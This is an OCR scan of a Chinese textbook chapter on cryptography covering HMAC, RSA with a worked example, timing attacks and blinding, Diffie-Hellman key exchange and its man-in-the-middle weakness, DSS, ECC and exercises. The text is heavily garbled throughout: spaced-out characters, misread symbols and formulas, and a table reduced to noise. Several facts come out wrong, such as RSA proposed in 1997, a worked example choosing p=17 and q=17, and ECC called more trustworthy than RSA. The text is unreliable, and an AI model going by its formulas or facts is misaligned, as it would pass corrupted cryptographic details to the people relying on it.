力 攻 击 (其 代价 为 2 数量级)， 或 者 是 生日 攻击 (这 是 第 二 种 攻击 的 特例 ， 请 见 下 面 的 
讨论 )。 

在 第 二 种 攻击 中 ， 攻 击 者 要 找 两 条 消息 M 和 AM'， 它 们 产生 相同 的 散 列 码 ; H(M)= 
H(M')， 这 就 是 以 前 提 到 的 生日 攻击 ,我 们 已 经 证 明 其 所 需 的 代价 为 2 数量级。 根据 现在 
的 技术 ， 若 代价 为 24 数量 级 ， 则 被 认为 是 可 行 的 ， 所 以 MDS 的 安全 性 不 能 得 到 保证 。 但 
是 ， 这 是 否 意味 着 像 MD5 这 样 的 128 位 散 列 函数 不 能 用 于 HMAC 呢 ? 回答 是 否定 的 ， 因 为 
要 攻击 MD5， 攻 击 者 可 以 选择 任何 消息 集 ， 不 用 专用 计算 机 离线 计算 来 寻找 碰撞 ， 由 于 攻 
击 者 知道 散 列 算法 和 默认 的 IV， 因 此 攻击 者 可 以 对 其 产生 的 任何 消息 计算 散 列 码 。 但 是 ， 攻 
击 HMAC 时 ， 由 于 攻击 者 不 知道 K， 所 以 ， 他 不 能 离线 产生 消息 / 散 列 码 对 ， 他 必须 观察 
HMAC 用 相同 的 密 钥 产生 的 消息 序列 ， 并 对 这 些 消 息 进行 攻击 。 散 列 码 长 为 128 位 时 ， 攻 击 
者 必须 观察 24 个 由 同一 密 钥 产生 的 分 组 ( 2” 位)， 对 于 1Gbps 的 连接 ， 要 想 攻击 成 功 ， 攻 击 
者 约 需 150 000 年 来 观察 同一 密 钥 产生 的 连续 密 钥 流 。 因 此 ， 当 注重 执行 速度 时 ， 用 MDS 而 
不 是 SHA 作为 HMAC 的 能 入 散 列 函数 ， 完 全 是 可 以 接受 的 。 


21.3 RSA 公 钥 加 密 算 法 
或 许 RSA 和 Diffie-Hellman 是 使 用 最 广泛 的 公 钥 加 密 算 法 。 这 里 讨论 RSA 及 其 安全 方面 
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的 问题 9S。21.4 节 介绍 Fiffie-Hellman。 


21.3.1 算法 描述 


MIT 的 Ron Rivest、Adi Shamir 和 Len Adleman 于 1997 年 提出 并 于 1978 年 首次 发 表 的 算 
法 [RIVE78] 是 最 早 的 一 种 公 钥 算 法 。RSA 算法 自 其 诞生 之 日 起 ， 就 成 为 被 广泛 接受 且 被 实现 
的 通用 公 钥 加 密 算法 。RSA 是 一 种 分 组 密码 ， 其 明文 和 密 文 均 是 0 ~ "一 1 之 间 的 整数 。 
对 明文 分 组 M 和 密 文 分 组 C， 加 密 和 解密 过 程 如 下 : 
C=M" mod n 
M=C‘ mod n=(M°)’ mod n=M“ mod n 
其 中 收发 双方 均 已 知 n 和 e， 只 有 接收 方 知道 4。 公 钥 加 密 算 法 的 公 钥 为 PU= {e, n}, $ 
钥 为 PR= {qd, n}。 该 算法 要 能 用 作 公 和 钥 加 密 ， 必 须 满足 下 列 条 件 : 
1. 可 以 找到 e、d 和 nn， 使 得 对 所 有 M<n, A M“=Mmodn. 
2. 对 所 有 M<n, HA M 和 C 是 比较 容易 的 。 
3. 由 e ln HE d 是 不 可 行 的 。 
前 两 个 要 求 是 容易 满足 的 ， 当 e 入 取 很 大 的 值 时 第 三 个 要 求 也 能 够 得 到 满足 。 
我 们 主要 讨论 第 一 个 要 求 ， 需 要 找 出 下 列 关 系 式 : 
M“ modn=M 
如 果 e Md BK b(n 的 乘法 逆 元 ， 上 述 关系 成 立 ， 其 中 (n) 是 欧 拉 函 数 。 在 附录 A 中 
描述 了 对 于 素数 p 和 4q， 有 $(pq)= 二 (p-1)(q-1)， 也 就 是 说 n 的 欧 拉 函 数 是 小 于 n 且 与 n 互 素 
的 正 整数 的 个 数 。e Ald 的 关系 可 如 下 描述 : 
ed mod $(n)=1 
上 式 等 价 于 : 
ed mod ¢(n)=1 
dmod $(n)=e' 
也 就 是 说 ，e 和 4d 是 模 O(n) 的 乘法 逆 元 ， 根 据 模 算术 的 性 质 ， 仅 当 d 和 pn ER (因此 e 和 
p(n 也 互 素 )， 即 gcd(g(D, d)=1; 也 就 是 说 ，d 和 b(n) 的 最 大 公约 数 是 1。 
图 21-5 总 结 了 RSA 算法 。 开 始 选择 两 个 素数 p 和 4g， 计 算 它们 的 积 n 作为 加 密 和 解密 的 
模 。 接 着 计算 n 的 欧 拉 函 数值 O(n). RES oin) 互 素 的 整数 e (Ble 和 b(n) 的 最 大 公约 
数 是 1 )。 最 后 计算 e KTR O(n) REŽI do d 和 e 具有 所 期 望 的 属性 。 
假定 用 户 A 已 经 公布 其 公 钥 ,用户 B 要 发 送 消 息 M 给 A, 那么 用 户 B 计算 C=M(mod 
n)， 并 发 送 C; 在 接收 端 ， 用 户 A 计算 M=Cmod n) 解密 出 消息 M。 
图 21-6 所 示 的 是 [SING99] 中 给 出 的 一 个 例子 。 本 例 中 ， 密 钥 产 生 过 程 如 下 : 
1. 选择 两 个 素数 ，p 二 17 Hl q=17. 
2. iF% n=pq=17X 11= 187. 
3. 计算 $(n)=(p-1)(g-1)=16 X 10= 160. 
4. 选择 e 使 其 与 p(n)==160 互 素 且 小 于 O(n), KBE e=7, 
5. 确 定 d 使 得 de mod 160=1 且 d<160。 因 为 23X7=161=(1X160) 十 1， 所 以 4d= 
23。 
所 得 的 公 钥 PU= {7, 187} ， 私 钥 PR= {23, 187} 。 这 个 例子 说 明 输 入 明文 M=88 时 密 钥 的 
使 用 情况 。 加 密 时 ， 需 要 计算 C=88" mod 187。 利 用 模 算 术 的 性 质 ， 我 们 如 下 计算 : 


日 ”本 节 使 用 一 些 数论 的 基本 概念 ， 请 参考 附录 A 





B2F AARAA EU 481 


Bare 
pamik pAq 


weep, a 
计算 p(n)=(p-1)(q-D . ea. 
计算 整数 e : ged(P(ni), e)=1; 1<e<q(n) 
SA z ‘ Ku={e, n} 

i wo RRE a} 





PU=7187 PR=23 187 
图 21-6 RSA 算法 举例 


88’ mod 187=[(88* mod 187) X (88° mod 187)X (88! mod 187)] mod 187 
88' mod 187=88 

88° mod 187=7744 mod 187=77 

88* mod 187=59 969 536 mod 187= 132 

88’ mod 187=(88 X 77 X 132) mod 187=894 432 mod 187=11 


解密 时 ， 我 们 计算 M=11” mod 187: 


117 mod 187=[(11! mod 187) X (11? mod 187)X(114 mod 187) 
X (118 mod 187) X (11° mod 187)]mod 187 
11' mod 187=11 
11? mod 187=121 
11* mod 187=14 641 mod 187=55 
11° mod 187=214 358 881 mod 187=33 
11” mod 187=(11 X 121 X 55 X33 X33) mod 187=79 720 245 mod 187=88 


21.3.2 RSA 的 安全 性 
对 RSA 算法 的 攻击 可 能 有 如 下 4 种 方式 : 


BAH: 这 种 方法 试图 穷 举 所 有 可 能 私 钥 。 

数学 攻击 : 有 多 种 数学 攻击 方法 ， 它 们 的 实质 都 是 试图 分 解 两 个 素数 的 成 绩 。 

计时 攻击 : 这 种 方法 依赖 于 解密 算法 的 运行 时 间 。 

选择 密 文 攻击 : 这 种 类 型 的 攻击 试图 发 现 RSA 算法 的 规则 。 对 这 种 攻击 的 讨论 超出 了 
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本 书 的 范围 。 

像 其 他 密码 体制 一 样 ，RSA 抗 这 力 攻击 的 方法 也 是 使 用 大 密 钥 空间 ， 所 以 e 和 < 的 位 数 
越 大 越 好 。 但 是 密 钥 产生 的 过 程 和 加 /解密 过 程 都 包含 复杂 的 运算 ， 因 此 ， 密 钥 越 大 ， 系 统 运 
行 速 度 越 慢 。 

下 面 我 们 简要 介绍 数学 攻击 和 计时 攻击 。 

因子 分 解 问题 ”我们 可 以 将 用 数学 方法 攻击 RSA 的 途径 分 为 三 种 : 

© 分 解 n 为 两 个 素 因子 。 这 样 可 以 计算 出 $(n)==(p 一 1)X(g 一 1)， 从 而 可 以 确定 d= 

e'(mod 由 (0D))。 

e 直接 确定 O(n) 而 不 先 确 定 p 和 494。 这 同样 也 可 确定 d=e'(mod $$(n))。 

e 直接 确定 4， 而 不 先 确定 O(n). 

对 RSA 的 密码 分 析 的 讨论 大 都 集中 于 将 n 分解 为 两 个 素数 的 因子 。 由 给 定 的 n 来 确定 
p(n) 等 价 于 因子 分 解 n[RIBE96]。 现 在 已 知 的 从 e 和 nn 确定 4 的 算法 至 少 和 因子 分 解 问题 一 样 
费时 。 因 此 ， 我 们 通过 将 因子 分 解 的 性 能 作为 基准 来 评价 RSA 的 安全 性 。 

尽管 因子 分 解 具 有 大 素数 因子 的 数 n 仍然 是 一 个 难题 ,但 是 不 像 以 前 那样 困难 。 与 对 
DES 的 算法 一 样 ，RSA 实验 室 同 时 还 发 布 了 用 位 数 为 100、110 或 121 等 的 密 钥 加 密 的 密 文 
件 供 有 兴趣 者 解密 。 最 近 被 解密 的 是 RSA-210， 其 密 钥 长 度 为 200 十 进 制 位 或 663 位 。 表 
21-2 给 出 了 迄今 为 止 得 出 的 一 些 结果 。 我 们 用 MIPS 年 来 描述 计算 的 代价 。MIPS 年 是 指 一 
台 每 秒 执 行 百 万 条 指令 的 处 理 器 运行 一 年 ， 即 执行 3X10 条 指令 (MIPS 年 数 不 能 用 于 后 
3 项 )。 


表 21-2 因子 分 解 问题 的 进展 情况 


121 398 830 
10 本 100 
mm | am | - 
m = 
T æ z 


注意 表 21-2 所 使 用 的 因子 分 解 方法 。 在 20 世纪 90 ER PHL BEA KERKE 
行 因子 分 解 。 对 RSA-130 的 攻击 使 用 了 称 为 一 般 数 域 (GNFS) 的 新 算法 ， 该 算法 能 够 因子 分 
解 比 RSA-129 更 大 的 数 ， 但 计算 代价 仅 是 二 次 筛 法 的 21%。 

计算 能 力 的 不 断 增强 和 因子 分 解 算法 的 不 断 改 进 ， 给 大 密 钥 的 使 用 造成 威胁 。 我 们 已 了 解 
到 ， 更 换 一 种 算法 可 使 速度 显著 增加 。 我 们 期 望 GNFS 还 可 以 进一步 改进 并 能 设计 出 更 好 的 算 
法 。 事 实 上 ， 对 某 种 特殊 形式 的 数 ， 用 特殊 数 域 第 (SNFS) 算法 进行 因子 分 解 比 一 般 数 域 筛 要 
快 得 多 ,我 们 可 以 期 望 算法 上 会 有 所 突破 ， 使 一 般 的 因子 分 解 的 性 能 在 时 间 上 大 约 与 SNFS 一 


样 或 者 甚至 比 SNFS 更 快 。 因 此 ， 我 们 在 选择 RSA 的 密 钥 大 小 时 应 谨慎 小 心 。 在 最 近 一 段 时 
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间 里 ， 密 钥 取 在 1024 ~ 2048 位 是 合适 的 。 
除了 要 指定 n 的 大 小 外 ， 研 究 者 还 提出 了 其 他 一 些 限制 条 件 。 为 了 防止 可 以 很 容易 地 破解 
n, RSA 算法 的 发 明 者 建议 p 和 4 还 应 满足 下 列 限制 条 件 : 
1. p 和 9g 的 长 度 应 仅 相 差 几 位 。 这 样 对 1024 位 (309 十 进 制 位 ) HRAMA, pA qa 都 应 
在 10” 和 10'% 之 间 。 
2. (p-1) 和 (4-1) 都 应 有 一 个 大 的 素 因 子 。 
3. gcd(p-1, 9-1) 应 该 较 小 。 
另外 ,已 经 证 明 , 若 e<z 且 d<ma4， 则 4 很 容易 确定 [WIEN90]。 
计时 攻击 ”如 果 你 想 知道 评价 密码 算法 的 安全 性 有 多 难 ， 那 么 计时 攻击 的 出 现 就 是 最 
好 的 例子 。 密 码 学 专家 Paul Kocher 已 证 明 ， 攻 击 者 可 以 通过 计算 解密 消息 所 用 的 时 间 来 
确定 私 钥 [KOCH96]。 计 时 攻击 不 仅 可 以 用 于 攻击 RSA， 而 且 可 以 用 于 攻击 其 他 的 公 钥 密 
码 系统 。 由 于 这 种 攻击 的 完全 不 可 预知 性 以 及 它 仅 依赖 于 明文 ， 所 以 计时 攻击 具有 很 大 的 
威胁 。 
计时 攻击 类 似 于 窃贼 通过 观察 他 人 转动 保险 柜 拨 号 盘 的 时 间 长 短 来 猜测 密码 ， 我 们 可 以 通 
过 RSA 加 密 和 解密 中 的 模 寡 算法 来 说 明 这 种 攻击 ， 但 这 种 攻击 可 以 攻击 任何 运行 时 间 可 变 的 
算法 。 在 这 种 算法 中 ， 模 帘 运 算是 通过 一 位 一 位 来 实现 的 ， 每 次 迭代 执行 一 次 模 乘 运算 ,但 若 
该 位 为 1， 则 还 需 执行 一 次 模 乘 运算 。 
正如 Kocher 在 其 论文 中 所 指出 的 ， 在 下 述 极端 情况 下 ， 我 们 很 容易 理解 计时 攻击 的 含义 。 
假定 在 模 寡 算法 中 ， 模 乘 函数 的 执行 时 间 只 在 几 种 情形 中 其 执行 时 间 比 整个 模 宕 运算 的 平均 执 
行 时 间 要 长 得 多 ,但 在 大 多 数 情 形 下 其 执行 时 间 相 当 快 。 计 时 攻击 是 从 最 左 位 bi 开始， 一 位 
一 位 地 进行 的 。 假 设 攻 击 者 已 知 前 面 的 j 位 (为 了 得 到 整个 整数 ， 攻 击 者 可 以 从 7 三 0 开 
始 ， 重 复 攻击 直至 已 知 整 个 指数 为 止 )， 则 对 给 定 的 密 文 ， 攻 击 者 可 以 完成 for 循环 的 前 7 次 和 迭 
代 ， 其 后 的 操作 依赖 于 未 知 的 指数 位 。 若 该 位 为 1， 则 要 执行 4 一 (ZXa)mod n。 对 有 些 a 和 4d 
的 值 ， 模 乘 运算 的 执行 速度 异常 慢 ， 假 定 攻击 者 知道 是 哪些 值 。 由 于 位 为 1 时 ， 对 这 些 值 执行 
迭代 的 速度 很 慢 ， 若 攻击 者 观察 到 解密 算法 的 执行 速度 总 是 很 慢 ， 则 可 以 认为 该 位 为 1 ; 若 攻 
击 者 多 次 观察 到 整个 算法 的 执行 都 很 快 ， 则 可 认为 该 位 为 0。 
在 实际 中 ， 模 寡 运 算 的 实现 并 没有 这 样 大 的 时 间 差 异 ， 一 次 迭代 的 执行 时 间 会 超过 整个 算 
法 的 平均 执行 时 间 ， 但 存在 足够 大 的 差异 使 得 计时 攻击 切实 可 行 。 关 于 这 个 问题 的 详细 讨论 ， 
请 参见 [KOCH96]。 
尽管 计时 攻击 会 造成 严重 的 威胁 ,但 是 有 一 些 简单 可 行 的 解决 方法 ， 包括: 
e 不 变 的 寡 运 算 时 间 : 保证 所 有 的 寡 运 算 在 返回 结果 前 执行 时 间 都 相同 。 这 种 方法 虽然 
很 简单 ， 但 会 降低 算法 的 性 能 。 
© 随机 延 时 : 通过 在 求 宕 算法 中 加 入 随机 延 时 来 迷惑 计时 攻击 者 可 提高 性 能 。Kocher 认 
为 ， 如 果 不 增加 足够 的 干扰 ， 那 么 攻击 者 可 以 通过 收集 额外 的 观察 数据 来 抵消 随机 延 
时 ,仍然 可 能 攻击 成 功 。 
e fam: 在 执行 寡 运 算 之 前 先 将 密 文 乘 上 一 个 随机 数 ， 这 一 过 程 可 使 攻击 者 不 知道 计算 
机 正在 处 理 的 是 密 文 的 哪些 位 ， 这 样 可 防止 攻击 者 一 位 一 位 地 进行 分 析 ， 而 这 种 分 析 
正 是 计时 攻击 的 本 质 所 在 。 
RSA 数据 安全 算法 (RSA Date Security) 在 乘积 中 就 使 用 了 隐蔽 方法 ， 它 用 私 钥 实现 操作 
M=C‘ mod n 在 的 过 程 如 下 : 
1. 产生 0 ~ n 一 1 之 间 秘 密 的 随机 数 。 
2. 计算 C'=C(r*) modn, HH e 是 公开 的 指数 。 


并 计算 Ye=a*# mod g。A 和 B 保 持 其 天 是 私有 
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3. 像 通 常 的 RSA 运算 一 样 ， 计 算 M’=(C') mod no 

4. 计算 M=M'r'modn, Hr! Br Bin ORI. BEE r modn=r modn, 可 以 
证 明 结 论 是 正确 的 。 

RSA 数据 安全 算法 由 于 使 用 了 隐蔽 方法 ， 其 性 能 降低 了 2% ~ 10%。 


21.4 Diffie-Hellman 和 其 他 非 对 称 算 法 
21.4.1 Diffie-Hellman 密 钥 交换 


Diffie 和 Hellman 在 一 篇 具有 独创 意义 的 论文 中 首次 提出 了 公 钥 算法 ， 给 出 了 公 钼 密码 学 
[DIFF76] 的 定义 ， 该 算法 通常 称 为 Diffie-Hellman 密 钥 交换 。 许 多 商业 产品 都 使 用 了 这 种 密 钥 
交换 技术 。 

该 算法 的 目的 是 使 两 个 用 户 能 安全 地 交换 密 钥 ， 以 便 在 后 续 的 通信 中 用 该 密 钥 对 消息 加 
密 。 该 算法 本 身 只 限于 进行 密 钥 交换 。 

Diffie-Hellman 算法 的 有 效 性 建立 在 计算 离散 对 数 是 很 困难 的 这 一 基础 之 上 。 简 单 地 说 ， 
我 们 可 如 下 定义 离散 对 数 。 首 先 定义 素数 p HERR. RA p 的 本 原 根 是 一 个 整数 ， 且 其 窒 可 
以 产生 1 ~ p 一 1 之 间 的 所 有 整数 。 也 就 是 说 ， 若 a 是 素数 p 的 本 原 根 ， 则 

a mod p, a’ mod p,**, amodP 
各 不 相同 ， 它 是 整数 1 ~ p 一 1 的 一 个 置换 。 

对 任意 蓝 数 小 于 p 的 整数 b 和 素数 p 的 本 原 

Wa, 我 们 可 以 找到 唯一 的 指数 i， 使 得 : 
b=a'modp ”这 里 0<i<p-l 

指数 i 称 为 b 的 以 a 为 底 的 模 p 离散 对 数 ， 记 为 

dloga.p(b) ©。 

算法 根据 这 个 背景 我 们 定义 Dffie-Hellman 
密 钥 交换 ， 如 图 21-7 所 示 。 在 这 种 方法 中 ， 素 
数 g 及 其 本 原 根 a 是 两 个 公开 的 整数 。 假 定 用 户 
A 和 用 户 B 和 希望 交换 密 钥 ， 那 么 用 户 A 选 择 一 
个 随机 整数 也 二 gq， 并 计算 Yi=a™ mod qo ZW 
地 ， 用 户 B 也 独立 地 选择 一 个 随机 整数 包 <9， 


的 ， 但 对 另 一 方 而 言 ， 了 7 是 公开 可 访问 的 。 用 户 
Al K= (Y) mod 将 其 作为 密 钥 。 这 两 == 
red ae, Besa ic = 图 21-7 Diffie-Hellman 密 钥 交换 算法 
K=(Ys)* mod q 

=(a%® mod q)“ mod q 

=(a"8)"8 mod q 

=q%2*4 mod q 

=(0%4)"8 mod q 

=(a"4 mod q}? mod q 
=(Y%4)"® mod q 


O ”许多 文献 将 离散 对 数 称 为 指标 ， 但 是 对 于 这 个 概念 还 没有 统一 的 说 法 ， 这 并 不 是 广泛 接受 的 叫 法 。 
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至 此 双方 完成 了 密 钥 值 的 交换 。 此 外 ， 由 于 名 和 如 是 私有 的 ， 所 以 攻击 者 只 能 通过 4g、 
x、 肪 和 五 来 进行 攻击 。 这 样 ， 他 就 必须 求 离 散 对 数 才能 确定 密 铀 。 例 如 ， 要 对 用 户 B 的 密 
钥 进行 攻击 ， 攻 击 者 就 必须 先 计算 : 

X= d logag(Ys) 

然后 他 就 可 以 像 用 户 B 那样 计算 出 密 钥 Ko 

Diffie-Hellman 密 钥 交换 的 安全 性 建立 在 下 述 事实 之 上 : 求 关 于 素数 的 模 寡 运算 相对 容易 ， 
而 计算 离散 对 数 却 非常 困难 ; 对 于 大 素数 ， 求 离散 对 数 被 认为 是 不 可 行 的 。 

这 里 的 一 个 例子 中 ， 密 钥 交 换 所 使 用 的 素数 q=353 和 它 的 一 个 本 原 根 a=3, AM B3? 
别 选 择 密 钥 X,=97 和 高二 233， 并 计算 相应 的 公 乌 : 

A 计算 入 = 二 3” mod 353=40 
B 计算 Ys==3”3 mod 353= 248 
A Al B 交换 公 钥 后 ， 双 方 均 计算 出 公共 的 密 钥 : 
A it # K= (Ys) mod 353= 248” mod 353= 160 
Bit ® K= (Y1) mod 353= 40” mod 353= 160 
我 们 假定 攻击 者 能 够 得 到 下 列 信息 : 
q= 353; a= 3; Y4=40; Ys= 248 

在 这 个 简单 的 例子 中 ， 用 蛮 力 攻击 确定 密 钥 160 是 可 能 的 。 特 别 地 ， 攻 击 者 可 以 通过 寻找 
方程 3" mod 353=40 Bk 3° mod 353=248 的 解 来 确定 公共 密 钥 。 亦 力 攻 击 方法 即 是 要 计算 
3 模 353 的 若干 每 ， 当 计算 结果 等 于 40 或 248 时 则 停止 。 因 为 3” mod 353=40, MARIEN 
97 时 可 得 到 期 望 的 结果 。 

对 于 大 数 ， 上 述 方法 实际 是 不 可 行 的 。 

密 钥 交 换 协 议 图 21-8 给 出 的 简单 协议 使 用 了 Diffie-Hellman 计算 方法 。 假 定 A 希望 与 
B 建立 连接 ， 并 使 用 密 钥 对 该 次 连接 中 的 消息 加 密 。 用 户 A 产生 一 次 性 私 钥 刺 ， 计 算 Y, # 
将 发 送 给 B; 用 户 B thee aA Xe, WA Ys, FOE Ys 发 送 给 A。 这 样 A 和 了 B 都 可 以 计算 
出 密 钥 。 当 然 ， 在 通信 前 A 和 了 B 都 应 已 知 公开 的 g fla, WAAR AH Ala, HH aq 
和 a 放 和 人 第 一 条 消息 中 。 

这 是 使 用 Diffie-Hellman 算法 的 另 一 个 例子 。 假 定 有 一 组 用 户 (如 LAN 上 的 所 有 用 户 )， 
且 每 个 用 户 都 产生 一 个 在 较 长 时 间 内 有 效 的 私 钥 妈 ， 并 计算 公开 的 马 。 这 些 公开 值 与 公开 的 9 
和 wx 一 起 存放 于 某 中 心目 录 中 ， 在 任意 时 刻 用 户 B 都 可 以 访问 用 户 A 的 公开 值 ， 计 算出 密 钥 ， 
并 用 密 钥 对 消息 加 密 后 发 送 给 A。 若 该 中 心目 录 是 可 信 的 ， 则 这 种 形式 的 通信 弃 可 保证 保密 
性 ， 又 可 保证 某 种 程度 的 真实 性 。 因 为 只 有 A 和 了 B 可 以 确定 密 钥 ， 所 有 其 他 用 户 均 不 能 读 取 
该 消息 (保密 性 ); 接收 方 A 知道 只 有 用 户 B 能 用 该 密 钥 产生 消息 (真实 性 )。 但 是 这 种 方法 不 
能 抗 重 放 攻击 。 

中 间 人 攻击 ”图 21-8 中 描述 的 协议 对 中 间 人 攻击 并 不 安全 。 假 设 Alice 和 Bob 希望 交换 
密 钥 ，Darth 是 攻击 者 。 中 间 人 攻击 按 如 下 步骤 进行 : 

1. 为 了 进行 攻击 ，Darth 首先 生成 两 个 随机 的 私 钥 Xd. 和 2， 然后 计算 相应 的 公 钥 Yo: 和 Yo。 

2. Alice 向 Bob 发 送 Yio 

3. Darth 截取 Y, 并 向 Bob 发 送 Yor. Darth 也 计算 K.= (Ys)? mod qo 

4. Bob 接收 Yo, IHH Ki= (Yoni)? mod qo 

5. Bob 向 Alice 发 送 X40 

6. Darth 截取 冶 并 向 Alice RIX Ymo Darth 计算 K,= (Ys)?! mod q- 

7. Alice 接收 Ym, 计算 K= (Ym) mod q- 
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Alice Bob ` 
Alice 和 了 Bob 共享 素数 9 和 Alice 和 了 Bob 共享 素数 9 和 
a， 满 足 a<g 且 a 是 q 的 一 个 a， 满 足 a<q 且 a 是 q 的 一 个 
KR ER 
Be ar Rae, 


Alice 计 算 共 享 的 秘密 密 Bob 计 算 共享 的 秘密 密 钥 
$1K=(Y,) * mod q K=(Y) *% mod q 
i i 


图 21-8 Diffie-Hellman 密 钥 交换 


这 时 ，Bob 和 Alice 认为 他 们 之 间 共 享 一 个 密 钥 。 但 实际 上 Bob 和 Darth FERH K, m 
Alice 和 Darth 共享 密 钥 Koo HÆ, Bob 和 Alice 之 间 的 所 有 通信 都 以 如 下 的 方式 受到 威胁 : 

1. Alice 发 送 加 密 消息 M : EK, M)。 

2. Darth 截获 加 密 的 消息 并 且 解 密 ， 恢 复出 消息 M。 

3. Darth 向 Bob 发 送 E(Ki, M) 或 者 发 送 E(Ki, M'), REM 可 以 是 任意 消息 。 在 第 一 种 情 
况 下 ，Darth 只 是 想 偷 听 通 信和 内容 却 不 算 改 它 。 在 第 二 种 情况 下 ，Darth 想 要 算 改 发 送 给 Bob 
的 消息 。 

对 中 间 人 攻击 ， 这 种 密 钥 交换 协议 比较 脆弱 ， 因 为 它 不 能 认证 参与 者 。 这 种 弱点 可 以 通过 
使 用 数字 签名 或 公 钥 证 书 来 克服 。 本 章 后 面 和 第 2 章 阐述 了 这 个 主题 。 


21.4.2 ”其 他 公 钥 密码 算法 


已 被 商业 接受 的 两 种 其 他 的 公 钥 算法 是 : DSS 和 椭圆 曲线 密码 加 密 技术 。 

数字 签名 标准 ”美国 国家 标准 与 技术 研究 所 (NIST) 已 经 发 布 了 联邦 信息 处 理 标 准 FIPS 
PUB 186， 也 就 是 数字 签名 标准 (DSS). DSS 使 用 了 SHA-1， 并 且 提 出 了 一 种 新 的 数字 签名 技 
术 ， 即 数字 签名 算法 (DSA). DSS RYE 1991 年 提出 。 在 公众 对 该 安全 方案 反馈 的 基础 上 ， 
1993 年 其 被 进行 了 修订 。1996 年 又 被 进一步 做 了 微小 修订 。DSS 使 用 了 一 种 专 为 数字 签名 功 
能 而 设计 的 算法 。 与 RSA 不 同 ， 它 不 能 用 来 加 密 或 者 进行 密 钥 交换 。 

椭圆 曲线 密码 学 ”大 多 数 使 用 公 钥 密码 学 进行 加 密 和 数字 签名 的 产品 和 标准 都 使 用 RSA 
算法 。 最 近 这 些 年 来 密 钥 的 位 数 一 直 在 增加 ， 这 对 RSA 的 应 用 是 很 大 的 负担 ， 对 进行 大 量 安 
全 交易 的 电子 商务 更 是 如 此 。 近 来 ， 出 现 的 一 种 具有 强大 竞争 力 的 椭圆 曲线 密码 学 (ECC) 对 





RSA 提出 了 挑战 。 在 标准 化 过 程 中 ， 如 关于 公 钥 密码 学 的 IEEE P1363 标准 中 ， 人 们 也 已 考虑 
了 ECC. 

与 RSA 相 比 ，ECC 的 主要 诱 人 之 处 在 于 ， 它 可 以 使 用 比 RSA 短 得 多 的 密 钥 得 到 相同 的 
安全 性 。 因 此 可 以 减少 处 理 负担 。 另 一 方面 ， 虽 然 关 于 ECC 的 理论 已 经 很 成 熟 ， 但 直到 最 
近 才 出 现 这 方面 的 产品 ， 对 ECC 的 密码 分 析 也 刚刚 起 步 ， 因 此 ECC 的 可 信和 度 比 RSA 高 。 

ECC HE RSA 3X Diffie-Hellman © ER, KF ECC 完整 的 数学 描述 已 超出 了 本 书 的 范 
Elo ECC 技术 的 基础 是 使 用 了 称 为 椭圆 曲线 数学 结构 的 理论 。 


21.5 ”推荐 读物 


ARB PRA MAC 的 完整 性 叙述 见 [STIN06] 和 [MENE97]。 
第 2 章 所 提供 的 关于 加 密 的 推荐 读物 包括 公 钥 加 密 和 对 称 加 密 。[DIFF88] 详细 地 描述 了 几 
种 设计 安全 双 密 钥 加 密 算法 的 尝试 ， 以 及 基于 它们 的 各 种 协议 的 逐渐 演变 过 程 。 
DIFF88 Diffie, W. “The First Ten Years of Public-Key Cryptography.” Proceedings of 
the IEEE. May 1988. 
MENE97 Menezes, A.; Oorshcot, P; and Vanstone, S. Handbook of Applied Cryptog- 


raphy. Boca Raton, FL: CRC Press, 1997 Available free online at http://cacr 
«uwaterloo.ca/hac/ 


STINO6 Stinson, D. Cryptography: Theory and Practice. Boca Raton, FL: CRC Press, 


2006. 
216 ”关键 术语 、 复 习题 和 习题 
关键 术语 
Diffie-Hellman key exchange (Diffie-Hellman 密 钥 交换 ) private key ( 私 钥 ) 
digital signature (数字 签名 ) public key (4348) 
Digital Signature Standard (DSS， 数 字 签 名 标准 ) public-key certificate ( 公 钥 认证 ) 
elliptic-curve cryptography (ECC， 椭 圆 曲 线 密码 学 ) public-key encryption ( 公 钥 加 密 ) 
key exchange ( 密 钥 交 换 ) secret key 秘密 密 钥 ) 
message authentication (消息 认证 ) Secure Hash Algorithm (SHA， 安 全 散 列 算法 ) 
message authentication code (MAC， 消 息 认 证 码 ) sevure hash function (安全 散 列 函数 ) 
message digest (消息 摘要 ) strong collision resistance ( 抗 强 碰 拉 性 ) 
one-way hash function ( 单 向 散 列 函数 ) weak collision resistance ( 抗 弱 碰 擅 性 ) 
复习 题 


21.1 散 列 函数 中 ， 压 缩 函数 是 什么 ? 

21.2 SHA 中 使 用 的 基本 算术 和 逻辑 函数 是 什么 ? 

21.3 ”为 了 用 一 个 散 列 函数 替代 另 一 个 散 列 函数 ，HMAC 中 需要 进行 哪些 改变 ? 
21.4 什么 是 单 向 函数 ? 

21.5 简要 说 明 一 下 Diffie-Hellman 密 钥 交 换 。 


习题 
21.1 考虑 一 个 32 位 的 散 列 函数 ， 它 是 两 个 16 位 函数 XOR 或 RXOR 的 连接 ，XOR Al RXOR 是 21.2 节 


所 定义 的 “两 个 简单 的 散 列 函 数 ”。 
a. 该 校 验 和 能 否 检测 出 由 奇数 位 错 所 引起 的 错误 ? 请 说 明 原 因 。 
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21.3 


21.4 


21.7 


b. 该 校 验 和 能 否 检测 出 由 偶数 位 错 所 引起 的 错误 ? 若 不 能 ， 请 说 明 该 校 验 和 所 不 能 检测 出 的 错误 
类 型 的 特征 。 

c. 若 该 函数 作为 消息 认证 中 的 散 列 函数 ， 试 分 析 其 效率 。 

a. 考 虑 下 面 的 散 列 函 数 。 消 息 是 一 列 十 进 制 数字 : M=(a, a2…, ay)。 对 于 某 一 预先 定义 的 值 n， 


计算 散 列 值 h: (x (ay) mod n。 该 散 列 值 能 满足 2.2 节 列 出 的 关于 散 列 函数 的 一 些 要 求 吗 ? 请 解释 
KAE T, 
b. 当 散 列 函数 g (an?) modn, HK (a). 
c. 当 M=(189, 632, 900, 722, 349) Al n=989 时 ， 计 算 (b) 的 散 列 函数 。 
利用 散 列 函数 可 以 构造 类 似 于 DES 结构 的 分 组 密码 。 因 为 散 列 函 数 是 单 向 的 并 且 分 组 密码 必须 可 
WM (为 了 解密 )， 请 问 为 什么 可 以 构造 类 似 于 DES 结构 的 分 组 密码 ? 
考虑 相反 的 问题 : 利用 加 密 算法 构造 单 向 散 列 函数 。 考 虑 使 用 有 一 个 已 知 密 钥 的 RSA 算法 。 如 下 
处 理 含有 若干 分 组 的 消息 : 加 密 第 一 个 分 组 ， 将 加 密 结果 与 第 二 个 分 组 异 或 并 加 密 之 ， 等 等 。 说 
明 在 解决 下 面 的 问题 时 该 方法 是 不 安全 的 。 给 定 两 个 分 组 消息 B81 、B2， 其 散 列 码 为 : 
RSAH(B1, B2)=RSA(RSA(B1) ® B2) 
